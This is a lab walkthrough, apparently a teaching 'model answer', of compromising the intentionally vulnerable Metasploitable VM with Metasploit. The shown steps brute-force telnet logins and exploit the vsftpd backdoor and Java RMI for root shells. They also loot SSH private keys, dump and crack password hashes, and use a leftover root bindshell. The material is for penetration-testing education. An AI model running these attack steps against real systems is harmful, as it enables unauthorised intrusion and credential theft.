[*] Time: 2013-06-06 02:50:25 UTC Note: host=10.10.10.200 service=rpcbind type=nmap.nse.rpcinfo.udp.111 data={"output"=>"\n  program version   port/proto  service\n  100000  2            111/tcp  rpcbind\n  100000  2            111/udp  rpcbind\n  100003  2,3,4       2049/tcp  nfs\n  100003  2,3,4       2049/udp  nfs\n  100005  1,2,3      37697/tcp  mountd\n  100005  1,2,3      58662/udp  mountd\n  100021  1,3,4      55980/udp  nlockmgr\n  100021  1,3,4      59689/tcp  nlockmgr\n  100024  1          37965/udp  status\n  100024  1          54441/tcp  status\n"}
[*] Time: 2013-06-06 02:50:26 UTC Note: host=10.10.10.200 service=status type=nmap.nse.rpcinfo.udp.37965 data={"output"=>"\n  program version   port/proto  service\n  100000  2            111/tcp  rpcbind\n  100000  2            111/udp  rpcbind\n  100003  2,3,4       2049/tcp  nfs\n  100003  2,3,4       2049/udp  nfs\n  100005  1,2,3      37697/tcp  mountd\n  100005  1,2,3      58662/udp  mountd\n  100021  1,3,4      55980/udp  nlockmgr\n  100021  1,3,4      59689/tcp  nlockmgr\n  100024  1          37965/udp  status\n  100024  1          54441/tcp  status\n"}
msf> 

There is lots of detail in the above, we can see the notes from the nmap command but we can also see information from the modules we have run. Here are some of the items to pay attention to - lets start with the samba shares..
[*] Time: 2013-06-06 02:22:16 UTC Note: host=10.10.10.200 service=smb type=smb.shares data={:shares=>[["print$", "DISK", "Printer Drivers"], ["tmp", "DISK", "oh noes!"], ["opt", "DISK", ""], ["IPC$", "IPC", "IPC Service (metasploitable server (Samba 3.0.20-Debian))"], ["ADMIN$", "IPC", "IPC Service (metasploitable server (Samba 3.0.20-Debian))"]]}

Also a listing of usernames from querying the samba server..
[*] Time: 2013-06-06 02:29:32 UTC Note: host=10.10.10.200 service=smb type=smb.domain.lookupsid data={:name=>"METASPLOITABLE", :txt_sid=>"5-21-1042354039-2475377354-766472396", :users=>{500=>"Administrator", 501=>"nobody", 1000=>"root", 1002=>"daemon", 1004=>"bin", 1006=>"sys", 1008=>"sync", 1010=>"games", 1012=>"man", 1014=>"lp", 1016=>"mail", 1018=>"news", 1020=>"uucp", 1026=>"proxy", 1066=>"www-data", 1068=>"backup", 1076=>"list", 1078=>"irc", 1082=>"gnats", 1200=>"libuuid", 1202=>"dhcp", 1204=>"syslog", 1206=>"klog", 1208=>"sshd", 1210=>"bind", 1212=>"postfix", 1214=>"ftp", 1216=>"postgres", 1218=>"mysql", 1220=>"tomcat55", 1222=>"distccd", 1224=>"telnetd", 1226=>"proftpd", 1228=>"statd", 1230=>"snmp", 3000=>"msfadmin", 3002=>"user", 3004=>"service"}, :groups=>{512=>"Domain Admins", 513=>"Domain Users", 514=>"Domain Guests", 1001=>"root", 1003=>"daemon", 1005=>"bin", 1007=>"sys", 1009=>"adm", 1011=>"tty", 1013=>"disk", 1015=>"lp", 1017=>"mail", 1019=>"news", 1021=>"uucp", 1025=>"man", 1027=>"proxy", 1031=>"kmem", 1041=>"dialout", 1043=>"fax", 1045=>"voice", 1049=>"cdrom", 1051=>"floppy", 1053=>"tape", 1055=>"sudo", 1059=>"audio", 1061=>"dip", 1067=>"www-data", 1069=>"backup", 1075=>"operator", 1077=>"list", 1079=>"irc", 1081=>"src", 1083=>"gnats", 1085=>"shadow", 1087=>"utmp", 1089=>"video", 1091=>"sasl", 1093=>"plugdev", 1101=>"staff", 1121=>"games", 1201=>"users", 1203=>"libuuid", 1205=>"dhcp", 1207=>"syslog", 1209=>"klog", 1211=>"scanner", 1213=>"nvram", 1215=>"fuse", 1217=>"crontab", 1219=>"mlocate", 1221=>"ssh", 1223=>"lpadmin", 1225=>"admin", 1227=>"bind", 1229=>"ssl-cert", 1231=>"postfix", 1233=>"postdrop", 1235=>"postgres", 1237=>"mysql", 1239=>"sambashare", 1241=>"telnetd", 3001=>"msfadmin", 3003=>"user", 3005=>"service"}}

Also a listing of NFS exports..
[*] Time: 2013-06-06 02:39:07 UTC Note: host=10.10.10.200 service=nfs type=nfs.exports data={:exports=>[["/", ["*"]]]}

All very good information and useful, but remember you cannot switch your brain off. When you ran 'msf> use auxiliary/admin/http/tomcat_administration' you will have seen it found a default username and password (tomcat/tomcat), but this is not stored in the database. So always remember to pay attention to what you get from the modules. With that, lets run nmap to check the udp ports as well..
msf> db_nmap -sU -p 111,2049,37965,55980,58662 -sV -sC 10.10.10.200
[*] Nmap: Starting Nmap 6.25 ( http://nmap.org ) at 2013-06-05 22:50 EDT
[*] Nmap: 'mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers'
[*] Nmap: Nmap scan report for 10.10.10.200
[*] Nmap: Host is up (0.0018s latency).
[*] Nmap: PORT      STATE SERVICE  VERSION
[*] Nmap: 111/udp   open  rpcbind  2 (RPC #100000)
[*] Nmap: | rpcinfo:
[*] Nmap: |   program version   port/proto  service
[*] Nmap: |   100000  2            111/tcp  rpcbind
[*] Nmap: |   100000  2            111/udp  rpcbind
[*] Nmap: |   100003  2,3,4       2049/tcp  nfs
[*] Nmap: |   100003  2,3,4       2049/udp  nfs
[*] Nmap: |   100005  1,2,3      37697/tcp  mountd
[*] Nmap: |   100005  1,2,3      58662/udp  mountd
[*] Nmap: |   100021  1,3,4      55980/udp  nlockmgr
[*] Nmap: |   100021  1,3,4      59689/tcp  nlockmgr
[*] Nmap: |   100024  1          37965/udp  status
[*] Nmap: |_  100024  1          54441/tcp  status
[*] Nmap: 2049/udp  open  nfs      2-4 (RPC #100003)
[*] Nmap: 37965/udp open  status   1 (RPC #100024)
[*] Nmap: | rpcinfo:
[*] Nmap: |   program version   port/proto  service
[*] Nmap: |   100000  2            111/tcp  rpcbind
[*] Nmap: |   100000  2            111/udp  rpcbind
[*] Nmap: |   100003  2,3,4       2049/tcp  nfs
[*] Nmap: |   100003  2,3,4       2049/udp  nfs
[*] Nmap: |   100005  1,2,3      37697/tcp  mountd
[*] Nmap: |   100005  1,2,3      58662/udp  mountd
[*] Nmap: |   100021  1,3,4      55980/udp  nlockmgr
[*] Nmap: |   100021  1,3,4      59689/tcp  nlockmgr
[*] Nmap: |   100024  1          37965/udp  status
[*] Nmap: |_  100024  1          54441/tcp  status
[*] Nmap: 55980/udp open  nlockmgr 1-4 (RPC #100021)
[*] Nmap: 58662/udp open  mountd   1-3 (RPC #100005)
[*] Nmap: MAC Address: 08:00:27:6A:57:59 (Cadmus Computer Systems)
[*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 5.22 seconds
msf> 

Now lets use what we found out above and create our own users list and password list. We will use those as we go through the credential modules. Lets use the telnet login module as an example..
msf > use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > show options
 
Module options (auxiliary/scanner/telnet/telnet_login):
 
   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             23               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      true             no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
 
msf auxiliary(telnet_login) > hosts -R
 
Hosts
=====
 
address       mac                name            os_name  os_flavor  os_sp  purpose  info  comments
-------       ---                ----            -------  ---------  -----  -------  ----  --------
10.10.10.200  08:00:27:6A:57:59  metasploitable  Linux    Debian            server         
 
RHOSTS => 10.10.10.200

Now lets specify our new custom user and password list and run it..
msf auxiliary(telnet_login) > set USER_FILE /root/users.txt
USER_FILE => /root/users.txt
msf auxiliary(telnet_login) > set PASS_FILE /root/pass.txt
PASS_FILE => /root/pass.txt
msf auxiliary(telnet_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(telnet_login) > run
 
[+] 10.10.10.200 - SUCCESSFUL LOGIN postgres : postgres
[*] Attempting to start session 10.10.10.200:23 with postgres:postgres
[*] Command shell session 1 opened (10.10.10.100:39846 -> 10.10.10.200:23) at 2013-06-05 23:18:14 -0400
[+] 10.10.10.200 - SUCCESSFUL LOGIN msfadmin : msfadmin
[*] Attempting to start session 10.10.10.200:23 with msfadmin:msfadmin
[*] Command shell session 2 opened (10.10.10.100:48299 -> 10.10.10.200:23) at 2013-06-05 23:18:30 -0400
[+] 10.10.10.200 - SUCCESSFUL LOGIN user : user
[*] Attempting to start session 10.10.10.200:23 with user:user
[*] Command shell session 3 opened (10.10.10.100:49253 -> 10.10.10.200:23) at 2013-06-05 23:18:31 -0400
[+] 10.10.10.200 - SUCCESSFUL LOGIN service : service
[*] Attempting to start session 10.10.10.200:23 with service:service
[*] Command shell session 4 opened (10.10.10.100:51263 -> 10.10.10.200:23) at 2013-06-05 23:18:32 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(telnet_login) > 

What you see is that we found 4 username and password combinations that worked. We can now update our password list. But what you can also see is that each successful connection created a session, so for 4 successful logins we have 4 sessions. Lets list them..
msf> sessions -l
 
Active sessions
===============
 
  Id  Type    Information                                 Connection
  --  ----    -----------                                 ----------
  1   shell   TELNET postgres:postgres (10.10.10.200:23)  10.10.10.100:39846 -> 10.10.10.200:23 (10.10.10.200)
  2   shell   TELNET msfadmin:msfadmin (10.10.10.200:23)  10.10.10.100:48299 -> 10.10.10.200:23 (10.10.10.200)
  3   shell   TELNET user:user (10.10.10.200:23)          10.10.10.100:49253 -> 10.10.10.200:23 (10.10.10.200)
  4   shell   TELNET service:service (10.10.10.200:23)    10.10.10.100:51263 -> 10.10.10.200:23 (10.10.10.200)

Lets interact with the first one..
msf> sessions -i 1
[*] Starting interaction with 1...

..and take a look who we are running as..
postgres@metasploitable:~$ id
id
uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres)
postgres@metasploitable:~$ 

If we interact with the second one..
msf> sessions -i 2
[*] Starting interaction with 2...
 
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
msfadmin@metasploitable:~$ id
id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)

We see some interesting group memberships. Lets take a look at what this user is allowed to do..
$sudo -l
[sudo] password for msfadmin: msfadmin
 
User msfadmin may run the following commands on this host:
    (ALL) ALL
msfadmin@metasploitable:~$

In a normal pentest, this would now become our focus since we have access to a root shell. But as we work through this model answer you will find this a lot :) So lets leave this for now and carry on running the other credential modules..
msf> use auxiliary/scanner/vnc/vnc_login
msf> use auxiliary/scanner/ftp/ftp_login
msf> use auxiliary/scanner/ssh/ssh_login
msf> use auxiliary/scanner/smb/smb_login
msf> use auxiliary/scanner/rservices/rlogin_login
msf> use auxiliary/scanner/mysql/mysql_login
msf> use auxiliary/scanner/postgres/postgres_login

Some of the modules need a bit of customising, run the ftp login module a second time but change the target port..
msf> use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set RPORT 2121

To run this one you need the information from the 'auxiliary/scanner/mysql/mysql_login' module..
msf> use auxiliary/scanner/mysql/mysql_hashdump
msf auxiliary(mysql_hashdump) > set USERNAME root

And again for this one you need to change the target port..
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RPORT 8180

Now having run through all of these, lets query the database with the 'creds' command..
msf> creds
 
Credentials
===========
 
host          port  user                pass                 type         active?
----          ----  ----                ----                 ----         -------
10.10.10.200  23    postgres            postgres             password     true
10.10.10.200  23    msfadmin            msfadmin             password     true
10.10.10.200  23    user                user                 password     true
10.10.10.200  513   proftpd                                  password     true
10.10.10.200  513   statd                                    password     true
10.10.10.200  513   snmp                                     password     true
10.10.10.200  513   msfadmin                                 password     true
10.10.10.200  513   user                                     password     true
10.10.10.200  513   service                                  password     true
10.10.10.200  5900                      password             password     true
10.10.10.200  23    service             service              password     true
10.10.10.200  21    anonymous           mozilla@example.com  password_ro  true
10.10.10.200  21    postgres            postgres             password     true
10.10.10.200  21    msfadmin            msfadmin             password     true
10.10.10.200  21    user                user                 password     true
10.10.10.200  21    service             service              password     true
10.10.10.200  22    postgres            postgres             password     true
10.10.10.200  22    msfadmin            msfadmin             password     true
10.10.10.200  22    user                user                 password     true
10.10.10.200  22    service             service              password     true
10.10.10.200  513   root                                     password     true
10.10.10.200  513   nobody                                   password     true
10.10.10.200  513   proxy                                    password     true
10.10.10.200  513   backup                                   password     true
10.10.10.200  513   syslog                                   password     true
10.10.10.200  513   klog                                     password     true
10.10.10.200  513   ftp                                      password     true
10.10.10.200  513   postgres                                 password     true
10.10.10.200  513   mysql                                    password     true
10.10.10.200  513   tomcat55                                 password     true
10.10.10.200  513   distccd                                  password     true
10.10.10.200  513   telnetd                                  password     true
10.10.10.200  2121  postgres            postgres             password     true
10.10.10.200  2121  msfadmin            msfadmin             password     true
10.10.10.200  2121  user                user                 password     true
10.10.10.200  2121  service             service              password     true
10.10.10.200  3306  root                                     password     true
10.10.10.200  5432  template1/postgres  postgres             password     true
10.10.10.200  8180  tomcat              tomcat               password     true
 
[*] Found 39 credentials.

Not bad. Once again you will see a few options to get root access, but as before lets leave that for now and carry on looking at what else we can do. Lets start working through the exploit modules using the services listing as our guideline. Bear in mind that the 'hosts -R' command will not work in the exploit modules since it does not set the RHOST variable, but you can use the 'setg' command to set the RHOST module globally within the console. Lets move on and use the vsftpd exploit module as an example...
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options
 
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic
 
 
msf exploit(vsftpd_234_backdoor) > setg RHOST 10.10.10.200
RHOST => 10.10.10.200
msf exploit(vsftpd_234_backdoor) > set PAYLOAD cmd/unix/interact
PAYLOAD => cmd/unix/interact
msf exploit(vsftpd_234_backdoor) > exploit
 
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (10.10.10.100:57397 -> 10.10.10.200:6200) at 2013-06-06 12:03:24 -0400
 
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

So we can see that the exploit worked, and we got a root shell. Yes, the box is pretty much toast several times over by now :) But since we are using this as a learning experience lets carry on. Now not all exploits are equal, some requre more tweaking of the options, some are limited in the payloads they can use so you always need to pay attention to the options and details. But what we want to aim for is the meterpreter payload. This is a post exploitation environment and is very powerful. Lets take a look..
msf> use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > show options
 
Module options (exploit/multi/misc/java_rmi_server):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    10.10.10.200     yes       The target address
   RPORT    1099             yes       The target port
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Generic (Java Payload)
 
 
msf exploit(java_rmi_server) > set PAYLOAD java/meterpreter/bind_tcp
PAYLOAD => java/meterpreter/bind_tcp
msf exploit(java_rmi_server) > exploit
 
[*] Started bind handler
[*] Using URL: http://0.0.0.0:8080/kIYIQkvBrFf
[*]  Local IP: http://127.0.0.1:8080/kIYIQkvBrFf
[*] Connected and sending request for http://10.10.10.100:8080/kIYIQkvBrFf/UnsiJ.jar
[*] 10.10.10.200     java_rmi_server - Replied to request for payload JAR
[*] Sending stage (30216 bytes) to 10.10.10.200
[+] Target 10.10.10.200:1099 may be exploitable...
[*] Meterpreter session 3 opened (10.10.10.100:34285 -> 10.10.10.200:4444) at 2013-06-06 12:15:07 -0400
[*] Server stopped.

So at this stage we can see the exploit worked and our meterpreter shell is  running. It has many different options  and also allows for post explotation scripts. Lets start by looking at our  privilege level..
meterpreter > getuid
Server username: root
 
That makes things easier. Lets run some post modules which will get us a bunch of useful data from the server..
meterpreter > run post/multi/gather/ssh_creds
[*] Finding .ssh directories
[*] Looting 3 directories
[+] Downloaded /home/msfadmin/.ssh/authorized_keys -> /root/.msf4/loot/20130606121729_default_10.10.10.200_ssh.authorized_k_711016.txt
[+] Downloaded /home/msfadmin/.ssh/id_rsa -> /root/.msf4/loot/20130606121730_default_10.10.10.200_ssh.id_rsa_972813.txt
[*] Saving private key id_rsa as cred
[+] Downloaded /home/msfadmin/.ssh/id_rsa.pub -> /root/.msf4/loot/20130606121730_default_10.10.10.200_ssh.id_rsa.pub_002754.txt
[+] Downloaded /home/user/.ssh/id_dsa.pub -> /root/.msf4/loot/20130606121731_default_10.10.10.200_ssh.id_dsa.pub_783953.txt
[+] Downloaded /home/user/.ssh/id_dsa -> /root/.msf4/loot/20130606121732_default_10.10.10.200_ssh.id_dsa_110756.txt
[*] Saving private key id_dsa as cred
[+] Downloaded /root/.ssh/known_hosts -> /root/.msf4/loot/20130606121732_default_10.10.10.200_ssh.known_hosts_465849.txt
[+] Downloaded /root/.ssh/authorized_keys -> /root/.msf4/loot/20130606121732_default_10.10.10.200_ssh.authorized_k_785562.txt
 
meterpreter > run post/linux/gather/hashdump
[+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20130606130051_default_10.10.10.200_linux.hashes_221962.txt
 
meterpreter > run post/linux/gather/enum_configs
[*] Running module against metasploitable
[*] Info:
[*]                     _                  _       _ _        _     _      ____   _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) || | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|                            |_|                                          Warning: Never expose this VM to an untrusted network!Contact: msfdev[at]metasploit.comLogin with msfadmin/msfadmin to get started
[*]     Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
 
[*] apache2.conf stored in /root/.msf4/loot/20130606130327_default_10.10.10.200_linux.enum.conf_844703.txt
[*] ports.conf stored in /root/.msf4/loot/20130606130328_default_10.10.10.200_linux.enum.conf_016771.txt
[-] Failed to open file: /etc/nginx/nginx.conf
[*] nginx.conf stored in /root/.msf4/loot/20130606130328_default_10.10.10.200_linux.enum.conf_177680.txt
[-] Failed to open file: /etc/snort/snort.conf
[*] snort.conf stored in /root/.msf4/loot/20130606130328_default_10.10.10.200_linux.enum.conf_159740.txt
[*] my.cnf stored in /root/.msf4/loot/20130606130329_default_10.10.10.200_linux.enum.conf_628567.txt
[*] ufw.conf stored in /root/.msf4/loot/20130606130329_default_10.10.10.200_linux.enum.conf_662218.txt
[*] sysctl.conf stored in /root/.msf4/loot/20130606130329_default_10.10.10.200_linux.enum.conf_545627.txt
[-] Failed to open file: /etc/security.access.conf
[*] security.access.conf stored in /root/.msf4/loot/20130606130330_default_10.10.10.200_linux.enum.conf_996933.txt
[*] shells stored in /root/.msf4/loot/20130606130330_default_10.10.10.200_linux.enum.conf_381893.txt
[-] Failed to open file: /etc/security/sepermit.conf
[*] sepermit.conf stored in /root/.msf4/loot/20130606130330_default_10.10.10.200_linux.enum.conf_602517.txt
[-] Failed to open file: /etc/ca-certificates.conf
[*] ca-certificates.conf stored in /root/.msf4/loot/20130606130330_default_10.10.10.200_linux.enum.conf_216152.txt
[*] access.conf stored in /root/.msf4/loot/20130606130331_default_10.10.10.200_linux.enum.conf_857353.txt
[-] Failed to open file: /etc/gated.conf
[*] gated.conf stored in /root/.msf4/loot/20130606130331_default_10.10.10.200_linux.enum.conf_352378.txt
[*] rpc stored in /root/.msf4/loot/20130606130332_default_10.10.10.200_linux.enum.conf_076375.txt
[-] Failed to open file: /etc/psad/psad.conf
[*] psad.conf stored in /root/.msf4/loot/20130606130332_default_10.10.10.200_linux.enum.conf_258656.txt
[*] debian.cnf stored in /root/.msf4/loot/20130606130333_default_10.10.10.200_linux.enum.conf_228841.txt
[-] Failed to open file: /etc/chkrootkit.conf
[*] chkrootkit.conf stored in /root/.msf4/loot/20130606130333_default_10.10.10.200_linux.enum.conf_609799.txt
[*] logrotate.conf stored in /root/.msf4/loot/20130606130333_default_10.10.10.200_linux.enum.conf_462583.txt
[-] Failed to open file: /etc/rkhunter.conf
[*] rkhunter.conf stored in /root/.msf4/loot/20130606130334_default_10.10.10.200_linux.enum.conf_871997.txt
[*] smb.conf stored in /root/.msf4/loot/20130606130334_default_10.10.10.200_linux.enum.conf_854546.txt
[*] ldap.conf stored in /root/.msf4/loot/20130606130335_default_10.10.10.200_linux.enum.conf_247954.txt
[-] Failed to open file: /etc/openldap/openldap.conf
[*] openldap.conf stored in /root/.msf4/loot/20130606130335_default_10.10.10.200_linux.enum.conf_562092.txt
[-] Failed to open file: /etc/cups/cups.conf
[*] cups.conf stored in /root/.msf4/loot/20130606130335_default_10.10.10.200_linux.enum.conf_150453.txt
[-] Failed to open file: /etc/opt/lampp/etc/httpd.conf
[*] httpd.conf stored in /root/.msf4/loot/20130606130335_default_10.10.10.200_linux.enum.conf_324356.txt
[*] sysctl.conf stored in /root/.msf4/loot/20130606130336_default_10.10.10.200_linux.enum.conf_122863.txt
[-] Failed to open file: /etc/proxychains.conf
[*] proxychains.conf stored in /root/.msf4/loot/20130606130336_default_10.10.10.200_linux.enum.conf_560935.txt
[-] Failed to open file: /etc/cups/snmp.conf
[*] snmp.conf stored in /root/.msf4/loot/20130606130336_default_10.10.10.200_linux.enum.conf_642527.txt
[-] Failed to open file: /etc/mail/sendmail.conf
[*] sendmail.conf stored in /root/.msf4/loot/20130606130336_default_10.10.10.200_linux.enum.conf_923786.txt
[-] Failed to open file: /etc/snmp/snmp.conf
[*] snmp.conf stored in /root/.msf4/loot/20130606130337_default_10.10.10.200_linux.enum.conf_581517.txt
 
meterpreter > run post/linux/gather/enum_users_history
[+] Info:
[+]                     _                  _       _ _        _     _      ____   _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) || | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|                            |_|                                          Warning: Never expose this VM to an untrusted network!Contact: msfdev[at]metasploit.comLogin with msfadmin/msfadmin to get started
[+]     Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
 
[-] Failed to open file: /home/root
/.bash_history
[*] History for root
 stored in /root/.msf4/loot/20130606130407_default_10.10.10.200_linux.enum.users_357378.txt
[-] Failed to open file: /home/root
/.mysql_history
[*] SQL History for root
 stored in /root/.msf4/loot/20130606130407_default_10.10.10.200_linux.enum.users_934546.txt
[-] Failed to open file: /home/root
/.viminfo
[*] VIM History for root
 stored in /root/.msf4/loot/20130606130407_default_10.10.10.200_linux.enum.users_249546.txt
[*] Last logs stored in /root/.msf4/loot/20130606130408_default_10.10.10.200_linux.enum.users_464718.txt
[*] Sudoers stored in /root/.msf4/loot/20130606130408_default_10.10.10.200_linux.enum.users_065232.txt

All good data which we will come back to later. For now lets carry on looking at the other exploits. Remember to check your options and leverage the information you already have as needed..
msf> use exploit/multi/samba/usermap_script
msf> use exploit/linux/postgres/postgres_payload
msf> use exploit/unix/irc/unreal_ircd_3281_backdoor
msf> use exploit/multi/http/tomcat_mgr_deploy
 
We have now exploited the target in a few ways, lets step back and take a look at some of the data we got - specifically the passwords we dumped using the post modules from the meterpreter shell. Since metasploit now has 'john-the-ripper' in it's toolset we will use that..
msf> use auxiliary/analyze/jtr_linux
msf auxiliary(jtr_linux) > show options
 
Module options (auxiliary/analyze/jtr_linux):
 
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Crypt      false            no        Try crypt() format hashes(Very Slow)
   JOHN_BASE                   no        The directory containing John the Ripper (src, run, doc)
   JOHN_PATH                   no        The absolute path to the John the Ripper executable
   Munge      false            no        Munge the Wordlist (Slower)
   Wordlist                    no        The path to an optional Wordlist

Seriously, you change nothing - you just run it. It will automatically build a simple wordlist and pull the hashes from the data you have in the database..
msf auxiliary(jtr_linux) > run
 
[*] Seeding wordlist with DB schema info... 0 words added
[*] Seeding with MSSQL Instance Names....0 words added
[*] Seeding with hostnames....1 words added
[*] Seeding with found credentials....82 words added
[*] Seeding with cracked passwords from John....0 words added
[*] Seeding with default John wordlist...88395 words added
[*] De-duping the wordlist....
[*] Wordlist Seeded with 88411 words
[*] HashList: /tmp/jtrtmp20130606-14139-18c04t4
[*] Trying Format:md5 Wordlist: /tmp/jtrtmp20130606-14139-2omcdv
 
guesses: 6  time: 0:00:58:10 14.37% (ETA: Thu Jun  6 20:33:24 2013)  c/s: 2435  trying: Piggy9
Use the "--show" option to display all of the cracked passwords reliably
Session aborted
[-] Auxiliary interrupted by the console user
[*] Auxiliary module execution completed

You can see I manually stopped the module after a bit, but lets see what progress was made. We will look at the hashes found, then the original list to see which were cracked..
msf auxiliary(jtr_linux) > cat /root/.msf4/john.pot
[*] exec: cat /root/.msf4/john.pot
 
$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:postgres
$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:msfadmin
$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:user
$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:service
$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:123456789
$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:batman
 
msf auxiliary(jtr_linux) > cat /tmp/jtrtmp20130606-14139-18c04t4
[*] exec: cat /tmp/jtrtmp20130606-14139-18c04t4
 
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash:10.10.10.200
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh:10.10.10.200
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false:10.10.10.200
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash:10.10.10.200
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash:10.10.10.200
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash:10.10.10.200
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash:10.10.10.200
msf auxiliary(jtr_linux) >

6 out of the 7 hashes were cracked. What you will also notice is that I used normal shell from within the metasploit msfconsole. Strictly speaking this is a bit of a cheat since we were trying to use only the metasploit tool, but there are a few simple things that we can do using this that there are no modules for (currently). To start with, remember the strange results we got in our first nmap command for port 1524? Lets take a look..
msf> telnet 10.10.10.200 1524
[*] exec: telnet 10.10.10.200 1524
 
Trying 10.10.10.200...
Connected to 10.10.10.200.
Escape character is '^]'.
id
root@metasploitable:/# uid=0(root) gid=0(root) groups=0(root)
ls
root@metasploitable:/# root@metasploitable:/# bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

Yay. Someone left a root shell listening on that port. Another way in. Moving, remember NFS? And the shares it was making available? Lets take a look..
